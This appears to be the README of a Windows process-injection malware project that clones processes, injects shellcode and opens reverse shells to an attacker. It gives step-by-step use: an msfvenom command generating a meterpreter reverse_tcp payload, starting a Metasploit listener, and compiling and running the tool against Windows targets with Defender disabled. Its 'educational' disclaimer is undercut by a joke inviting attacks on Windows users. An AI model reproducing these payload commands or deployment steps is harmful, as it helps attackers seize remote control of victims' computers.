Process injection malware that clones windows processes, injects them with shellcode and executes them to attempt numerous reverse shells on the attacker. (Made with 🤎 for Windows users)
This is only for educational and research purposes (except if your target are windows users)
- Clone the repo
git clone
- Generate shellcode through msfvenom
msfvenom --platform windows --arch x64 -p windows/x64/meterpreter/reverse_tcp LHOST=<IP adress> LPORT=443 -f c --var-name=shellcode
Replace shellcode with that in
Start the listener on the Attacker machine (Run msfconsole as sudo)
- Compile the code (MSVC compiler recommended) and execute
Attacker Kali Linux/ParrotOS VMs, metasploit-framework
Target: Windows 7/10/11 (with Windows defender turned off), Visual C++, C